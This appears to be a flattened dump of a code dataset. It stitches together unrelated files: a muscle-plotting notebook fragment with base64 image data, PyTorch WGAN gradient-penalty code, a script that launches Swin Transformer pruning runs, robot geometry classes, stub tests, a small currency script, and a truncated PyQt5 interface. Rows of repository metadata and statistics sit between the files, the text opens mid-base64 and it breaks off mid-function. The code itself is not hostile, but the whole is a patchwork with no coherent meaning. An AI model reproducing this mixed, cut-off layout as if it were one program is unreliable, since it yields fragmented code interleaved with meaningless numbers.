QlSZKkAhi0JUmSpAIYtCVpgomIXSPi3Kb1vSPi2oJe65SIuHCM7YdGxNeKeG1Jmui8jrYkTTARMR/4p8x80w54rVuBkzLzmTH2+SHwocx8rOh6JGkicURbkiaevwL2b9xl7uKImB8R9wFExAcj4vqI+E5EPBIR50fExyPiroi4PSJ2a+y3f0R8PyLuiIifRsQbhr9IRBwE9A+F7Ig4NSLui4i7I+InTbt+h/rtkyVJTQzakjTxXAA8lJkLMvMTI2x/E3A6cBTwl8C6zDyC+m2pf7+xzxXAf8rMNwN/DFw6wnkWAXc2rV8InJCZhwMnNbUvBX59O96PJE1KXe0uQJI07n6cmS8DL0fEi9RHnAHuBQ6LiBnAscA1ETF0TO8I59kLWNO0fgvwtYj4BvDNpvangb3HsX5JmhQM2pI0+fQ3Ldea1mvU/98vAS9k5oItnGc9sMvQSmaeHRFHA+8ElkXEgsx8FpjW2FeS1MSpI5I08bwMzNzWgzPzJeCRiDgVIOoOH2HXB4ADhlYiYv/M/HlmXgg8A8xrbDoIuG9b65GkycqgLUkTTGMU+ZbGFxMv3sbTvB/4cETcDSwHTh5hn58AR8Sm+SUXR8S9jS9e/gS4u9H+m8B3t7EOSZq0vLyfJGlUEfEF4DuZ+cNRtvcC/w/4tcys7NDiJKnDOaItSRrLfwf6xti+D3CBIVuSXs0RbUmSJKkAjmhLkiRJBTBoS5IkSQUwaEuSJEkFMGhLkiRJBTBoS5IkSQX4/yqbv35hIEZTAAAAAElFTkSuQmCC\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc79c1c3160>"
]
},
"metadata": {},
"output_type": "display_data"
}
],
"source": [
"fig, ax = plt.subplots(1, 1, figsize=(6,6), sharex=True)\n",
"\n",
"ax.plot(t,FiberLen, label = 'fiber')\n",
"ax.plot(t,TendonLen, label = 'tendon')\n",
"plt.grid()\n",
"plt.xlabel('time (s)')\n",
"plt.ylabel('Length (m)')\n",
"ax.legend(loc='best')\n",
"\n",
"\n",
"fig, ax = plt.subplots(1, 3, figsize=(12,4), sharex=True, sharey=True)\n",
"ax[0].plot(t,FiberLen, label = 'fiber')\n",
"ax[1].plot(t,TendonLen, label = 'tendon')\n",
"ax[2].plot(t,FiberLen + TendonLen, label = 'muscle (tendon + fiber)')\n",
"\n",
"ax[1].set_xlabel('time (s)')\n",
"ax[0].set_ylabel('Length (m)')\n",
"#plt.legend(loc='best')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.6.3"
},
"latex_envs": {
"LaTeX_envs_menu_present": true,
"autoclose": false,
"autocomplete": true,
"bibliofile": "biblio.bib",
"cite_by": "apalike",
"current_citInitial": 1,
"eqLabelWithNumbers": true,
"eqNumInitial": 1,
"hotkeys": {
"equation": "Ctrl-E",
"itemize": "Ctrl-I"
},
"labels_anchors": false,
"latex_user_defs": false,
"report_style_numbering": false,
"user_envs_cfg": false
},
"nbTranslate": {
"displayLangs": [
"*"
],
"hotkey": "alt-t",
"langInMainMenu": true,
"sourceLang": "en",
"targetLang": "fr",
"useGoogleTranslate": true
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 135.276144
| 19,504
| 0.878571
| 3,797
| 82,789
| 19.109297
| 0.607585
| 0.002508
| 0.000703
| 0.00492
| 0.054577
| 0.042228
| 0.037019
| 0.030789
| 0.029163
| 0.023788
| 0
| 0.138889
| 0.055962
| 82,789
| 612
| 19,505
| 135.276144
| 0.789485
| 0
| 0
| 0.49183
| 0
| 0.027778
| 0.937819
| 0.832021
| 0
| 1
| 0.000846
| 0
| 0
| 1
| 0
| true
| 0
| 0.006536
| 0
| 0.006536
| 0.006536
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78cdbbfb7e312f827587d9414b1b3a9f0af33882
| 1,669
|
py
|
Python
|
torchbot/models/wgan_utils.py
|
stevehuanghe/torch_bot
|
443413116fa731c07c83ca2d7b5dacd2202ce9cb
|
[
"MIT"
] | null | null | null |
torchbot/models/wgan_utils.py
|
stevehuanghe/torch_bot
|
443413116fa731c07c83ca2d7b5dacd2202ce9cb
|
[
"MIT"
] | null | null | null |
torchbot/models/wgan_utils.py
|
stevehuanghe/torch_bot
|
443413116fa731c07c83ca2d7b5dacd2202ce9cb
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.autograd as autograd
import torch.nn.functional as F
def calc_gradient_penalty(netD, real_data, fake_data, lambda_gp=10.0):
batch_size = real_data.size(0)
device = real_data.device
alpha = torch.rand(batch_size, 1)
alpha = alpha.expand(real_data.size())
alpha = alpha.to(device)
interpolates = (alpha * real_data + ((1.0 - alpha) * fake_data)).requires_grad_(True)
disc_interpolates = netD(interpolates)
outputs = torch.ones(disc_interpolates.size()).to(device)
gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,
grad_outputs=outputs,
create_graph=True, retain_graph=True, only_inputs=True)[0]
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * lambda_gp
return gradient_penalty
def calc_gradient_penalty_cd(netD, real_data, fake_data, labels, lambda_gp=10.0):
batch_size = real_data.size(0)
device = real_data.device
alpha = torch.rand(batch_size, 1)
alpha = alpha.expand(real_data.size())
alpha = alpha.to(device)
interpolates = (alpha * real_data + ((1.0 - alpha) * fake_data)).requires_grad_(True)
disc_interpolates = netD(interpolates, labels)
outputs = torch.ones(disc_interpolates.size()).to(device)
gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,
grad_outputs=outputs,
create_graph=True, retain_graph=True, only_inputs=True)[0]
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * lambda_gp
return gradient_penalty
| 36.282609
| 89
| 0.674655
| 219
| 1,669
| 4.917808
| 0.214612
| 0.07428
| 0.044568
| 0.040854
| 0.869081
| 0.831941
| 0.831941
| 0.831941
| 0.831941
| 0.831941
| 0
| 0.018237
| 0.211504
| 1,669
| 46
| 90
| 36.282609
| 0.800152
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78d5cbb89c55d44793abcc61d44dac0b7b3fc2b6
| 3,691
|
py
|
Python
|
multiprune/multiprune.py
|
5joono/Swin-Transformer
|
b5b7e85aa11ad72b2bec2d458fa78066e4c3d0f2
|
[
"MIT"
] | null | null | null |
multiprune/multiprune.py
|
5joono/Swin-Transformer
|
b5b7e85aa11ad72b2bec2d458fa78066e4c3d0f2
|
[
"MIT"
] | null | null | null |
multiprune/multiprune.py
|
5joono/Swin-Transformer
|
b5b7e85aa11ad72b2bec2d458fa78066e4c3d0f2
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import pandas as pd
os.environ['MKL_THREADING_LAYER'] = 'GNU'
df = pd.DataFrame(columns=['multiprune', 'headstr', 'pluslayer', 'plushead', 'acc1'])
df.to_csv("multiprune.csv",index=False)
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 1_7.11.0.7.9.9_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 2_1+7.11+4.0+3.8+7.9+6.9+11_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 3_8+1+7.1+11+4.0+3+5.8+2+7.9+2+6.9+11+6_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 4_8+1+4+7.3+1+11+4.0+10+3+5.8+2+5+7.9+2+11+6.3+9+11+6_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 5_1+4+6+7+8.1+3+4+6+11.0+3+5+8+10.1+2+5+7+8.2+6+7+9+11.3+6+7+9+11_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 6_1+4+6+7+8+10.0+1+3+4+6+11.0+3+5+7+8+10.1+2+4+5+7+8.2+3+6+7+9+11.3+6+7+9+10+11_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 7_1+4+5+6+7+8+10.0+1+2+3+4+6+11.0+3+4+5+7+8+10.1+2+3+4+5+7+8.2+3+4+6+7+9+11.1+3+6+7+9+10+11_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 8_1+3+4+5+6+7+8+10.0+1+2+3+4+6+8+11.0+1+3+4+5+7+8+10.1+2+3+4+5+7+8+11.2+3+4+6+7+8+9+11.1+3+5+6+7+9+10+11_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 9_1+3+4+5+6+7+8+10+11.0+1+2+3+4+6+8+9+11.0+1+3+4+5+7+8+9+10.1+2+3+4+5+6+7+8+11.0+2+3+4+6+7+8+9+11.1+3+5+6+7+8+9+10+11_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 10_1+3+4+5+6+7+8+9+10+11.0+1+2+3+4+6+8+9+10+11.0+1+3+4+5+6+7+8+9+10.0+1+2+3+4+5+6+7+8+11.0+1+2+3+4+6+7+8+9+11.0+1+3+5+6+7+8+9+10+11_999_999')
os.system(f'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml --resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/ --prune 11_1+2+3+4+5+6+7+8+9+10+11.0+1+2+3+4+6+7+8+9+10+11.0+1+2+3+4+5+6+7+8+9+10.0+1+2+3+4+5+6+7+8+9+11.0+1+2+3+4+6+7+8+9+10+11.0+1+2+3+5+6+7+8+9+10+11_999_999')
| 175.761905
| 380
| 0.742075
| 879
| 3,691
| 2.937429
| 0.076223
| 0.021689
| 0.119287
| 0.178931
| 0.9055
| 0.901627
| 0.890008
| 0.889233
| 0.867932
| 0.867157
| 0
| 0.20431
| 0.057166
| 3,691
| 20
| 381
| 184.55
| 0.537644
| 0
| 0
| 0
| 0
| 0.647059
| 0.915989
| 0.547154
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
15334a422b61b2077f52a6752ab49e7bc78d0d25
| 194
|
py
|
Python
|
portal_gun/commands/exceptions.py
|
Coderik/portal-gun
|
081020a46b16b649497bceb6c2435b1ba135b487
|
[
"MIT"
] | 69
|
2018-05-03T18:25:43.000Z
|
2021-02-10T11:37:28.000Z
|
portal_gun/commands/exceptions.py
|
Coderik/portal-gun
|
081020a46b16b649497bceb6c2435b1ba135b487
|
[
"MIT"
] | 7
|
2018-09-19T06:39:11.000Z
|
2022-03-29T21:55:08.000Z
|
portal_gun/commands/exceptions.py
|
Coderik/portal-gun
|
081020a46b16b649497bceb6c2435b1ba135b487
|
[
"MIT"
] | 11
|
2018-07-30T18:09:12.000Z
|
2019-10-03T15:36:13.000Z
|
class CommandError(Exception):
def __init__(self, message):
super(CommandError, self).__init__(message)
def __srt__(self):
return self.message
def __repr__(self):
return self.message
| 19.4
| 45
| 0.757732
| 24
| 194
| 5.458333
| 0.458333
| 0.251908
| 0.21374
| 0.320611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134021
| 194
| 9
| 46
| 21.555556
| 0.779762
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.285714
| 0.857143
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
156fc46a2c0e3320cf0ceccc3d93a6a8adc5b6e9
| 1,932
|
py
|
Python
|
pykin/geometry/geometry.py
|
jdj2261/pykin
|
da952b8ec023382b8a324d1095b0cfd675c7452b
|
[
"MIT"
] | 14
|
2021-08-09T06:59:10.000Z
|
2022-03-09T13:05:46.000Z
|
pykin/geometry/geometry.py
|
jdj2261/pykin
|
da952b8ec023382b8a324d1095b0cfd675c7452b
|
[
"MIT"
] | null | null | null |
pykin/geometry/geometry.py
|
jdj2261/pykin
|
da952b8ec023382b8a324d1095b0cfd675c7452b
|
[
"MIT"
] | 4
|
2021-12-13T03:23:36.000Z
|
2022-03-09T11:34:29.000Z
|
from pykin.kinematics.transform import Transform
class Visual:
"""
class of Visual
Args:
offset (Transform): visual offset
geom_type (str): visual type (box, cylinder, spehre, mesh)
geom_param (dict): visual parameters
"""
TYPES = ['box', 'cylinder', 'sphere', 'mesh']
def __init__(
self,
offset=Transform(),
geom_type=None,
geom_param=None
):
self.offset = offset
self.gtype = geom_type
self.gparam = geom_param
def __str__(self):
return f"""Visual(offset={self.offset},
geom_type={self.gtype},
geom_param={self.gparam})"""
def __repr__(self):
return 'pykin.geometry.geometry.{}()'.format(type(self).__name__)
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, offset):
self._offset = Transform(offset.pos, offset.rot)
class Collision:
"""
class of Collision
Args:
offset (Transform): collision offset
geom_type (str): collision type (box, cylinder, spehre, mesh)
geom_param (dict): collision parameters
"""
TYPES = ['box', 'cylinder', 'sphere', 'mesh']
def __init__(
self,
offset=Transform(),
geom_type=None,
geom_param=None
):
self.offset = offset
self.gtype = geom_type
self.gparam = geom_param
def __str__(self):
return f"""Collision(offset={self.offset},
geom_type={self.gtype},
geom_param={self.gparam})"""
def __repr__(self):
return 'pykin.geometry.geometry.{}()'.format(type(self).__name__)
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, offset):
self._offset = Transform(offset.pos, offset.rot)
| 25.76
| 73
| 0.56677
| 204
| 1,932
| 5.112745
| 0.191176
| 0.115053
| 0.092042
| 0.032598
| 0.780441
| 0.780441
| 0.780441
| 0.780441
| 0.707574
| 0.707574
| 0
| 0
| 0.314182
| 1,932
| 75
| 74
| 25.76
| 0.78717
| 0.177019
| 0
| 0.893617
| 0
| 0
| 0.24427
| 0.138179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.212766
| false
| 0
| 0.021277
| 0.12766
| 0.446809
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
15b205fa861b08fd926516fefd5eca31d984d4bf
| 670
|
py
|
Python
|
umapi_client/test/tests.py
|
wikimedia/umapi_client
|
76e56f17055dc8eb3d0584af9d5519d7b8359c14
|
[
"BSD-3-Clause"
] | 1
|
2017-09-03T21:33:21.000Z
|
2017-09-03T21:33:21.000Z
|
umapi_client/test/tests.py
|
dartar/umapi_client
|
76e56f17055dc8eb3d0584af9d5519d7b8359c14
|
[
"BSD-3-Clause"
] | null | null | null |
umapi_client/test/tests.py
|
dartar/umapi_client
|
76e56f17055dc8eb3d0584af9d5519d7b8359c14
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Implement tests for umapi_client.
"""
def test_good_request_no_params_raw():
assert False # TODO: implement your test here
def test_good_request_no_params_agg():
assert False # TODO: implement your test here
def test_good_request_no_params_ts():
assert False # TODO: implement your test here
def test_good_request_with_params_raw():
assert False # TODO: implement your test here
def test_good_request_with_params_agg():
assert False # TODO: implement your test here
def test_good_request_with_params_ts():
assert False # TODO: implement your test here
def test_bad_request():
assert False # TODO: implement your test here
| 24.814815
| 50
| 0.758209
| 100
| 670
| 4.75
| 0.21
| 0.103158
| 0.221053
| 0.353684
| 0.92
| 0.92
| 0.877895
| 0.802105
| 0.802105
| 0.802105
| 0
| 0
| 0.179104
| 670
| 26
| 51
| 25.769231
| 0.863636
| 0.374627
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
ecc0995e8eadfd478975e8e7e053cc2cb9e27f75
| 397
|
py
|
Python
|
modulos/Moeda/Moeda.py
|
matewszz/Python
|
18b7fc96d3ed294d2002ed484941a0ee8cf18108
|
[
"MIT"
] | null | null | null |
modulos/Moeda/Moeda.py
|
matewszz/Python
|
18b7fc96d3ed294d2002ed484941a0ee8cf18108
|
[
"MIT"
] | null | null | null |
modulos/Moeda/Moeda.py
|
matewszz/Python
|
18b7fc96d3ed294d2002ed484941a0ee8cf18108
|
[
"MIT"
] | null | null | null |
import Projeto
x = float(input('Digite um valor: '))
print(f'A metadade de {Projeto.moeda(x)} é {Projeto.moeda(Projeto.metade(x))}.')
print(f'O dobro de {Projeto.moeda(x)} é {Projeto.moeda(Projeto.dobro(x))}.')
print(f'Aumentando 10% de {Projeto.moeda(x)}, temos {Projeto.moeda(Projeto.aumentar(x))}.')
print(f'Diminuindo 13% de {Projeto.moeda(x)}, temos {Projeto.moeda(Projeto.diminuir(x))}.')
| 44.111111
| 91
| 0.702771
| 64
| 397
| 4.359375
| 0.390625
| 0.344086
| 0.200717
| 0.215054
| 0.530466
| 0.530466
| 0.530466
| 0.530466
| 0
| 0
| 0
| 0.011019
| 0.085642
| 397
| 8
| 92
| 49.625
| 0.757576
| 0
| 0
| 0
| 0
| 0.666667
| 0.793451
| 0.360202
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
01d72a73810e26c5a4fcc2b0a36023e0f058e43c
| 94,002
|
py
|
Python
|
com/zeketian/imageutil/ui/MainUI.py
|
ZekeTian/ImageUtils
|
af2adfe8b4457cae95e2bb6a0a4200ca5611344d
|
[
"Apache-2.0"
] | 3
|
2021-03-15T15:17:06.000Z
|
2021-04-23T02:07:21.000Z
|
com/zeketian/imageutil/ui/MainUI.py
|
ZekeTian/ImageUtils
|
af2adfe8b4457cae95e2bb6a0a4200ca5611344d
|
[
"Apache-2.0"
] | null | null | null |
com/zeketian/imageutil/ui/MainUI.py
|
ZekeTian/ImageUtils
|
af2adfe8b4457cae95e2bb6a0a4200ca5611344d
|
[
"Apache-2.0"
] | 1
|
2020-12-28T09:15:52.000Z
|
2020-12-28T09:15:52.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'main-ui.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
import cv2
from PyQt5 import QtCore, QtGui, QtWidgets
import os
import copy
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QImage, QPixmap, QGuiApplication, QCursor, QColor
from PyQt5.QtWidgets import QFileDialog, QGraphicsPixmapItem, QGraphicsScene, QSlider, QApplication, QInputDialog, \
QLineEdit, QMessageBox
from com.zeketian.imageutil.control.BasicProcessingUtil import *
from com.zeketian.imageutil.ui.CustomLabel import ImageLabel
from com.zeketian.imageutil.ui.CustomDialog import *
from com.zeketian.imageutil.ui.ColorCatcher import ColorCatcher
class MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(926, 806)
font = QtGui.QFont()
font.setPointSize(10)
MainWindow.setFont(font)
self.__icon_path = "{0}/ui/edit_image.png".format(os.getcwd())
self.create_widget(MainWindow)
self.retranslateUi(MainWindow)
self.btn_lightness.clicked.connect(self.slider_lightness.show)
self.slider_lightness.sliderReleased.connect(self.slider_lightness.hide)
self.slider_blur.sliderReleased.connect(self.slider_blur.hide)
self.slider_compress.sliderReleased.connect(self.slider_compress.hide)
# 界面初始化时的一些基本操作
self.__current_img = None # 当前显示的图片
self.__original_img = None # 原始的图片
self.__last_img = None # 上一步操作的图片
self.__current_operation = None # 记录当前的操作
self.__lightness_max = 100
self.__lightness_min = -100
self.slider_lightness.setMaximum(100)
self.slider_lightness.setMinimum(-100)
self.slider_lightness.setTickPosition(QSlider.TicksBelow) # 在滑动块下文设置刻度值
self.slider_lightness.setTickInterval(5) # 设置刻度值间隔
self.slider_lightness.hide()
self.slider_blur.hide()
self.slider_compress.hide()
self.btn_screenshot.hide()
self.control.hide()
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def create_widget(self, MainWindow):
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setStyleSheet("background: rgb(30, 30, 30)")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_3.setContentsMargins(2, 2, 2, 2)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.title = QtWidgets.QFrame(self.centralwidget)
self.title.setMinimumSize(QtCore.QSize(0, 55))
self.title.setMaximumSize(QtCore.QSize(188888, 55))
self.title.setStyleSheet("background: rgb(60, 60, 60)")
self.title.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.title.setFrameShadow(QtWidgets.QFrame.Raised)
self.title.setObjectName("title")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.title)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.icon = QtWidgets.QToolButton(self.title)
self.icon.setMinimumSize(QtCore.QSize(90, 45))
self.icon.setMaximumSize(QtCore.QSize(90, 45))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.icon.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.icon.setFont(font)
self.icon.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.icon.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(self.__icon_path), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.icon.setIcon(icon)
self.icon.setIconSize(QtCore.QSize(40, 40))
self.icon.setObjectName("icon")
self.horizontalLayout_4.addWidget(self.icon)
self.operation = QtWidgets.QFrame(self.title)
self.operation.setMinimumSize(QtCore.QSize(250, 45))
self.operation.setMaximumSize(QtCore.QSize(250, 45))
self.operation.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.operation.setFrameShadow(QtWidgets.QFrame.Raised)
self.operation.setObjectName("operation")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.operation)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.btn_open = QtWidgets.QToolButton(self.operation)
palette = QtGui.QPalette()
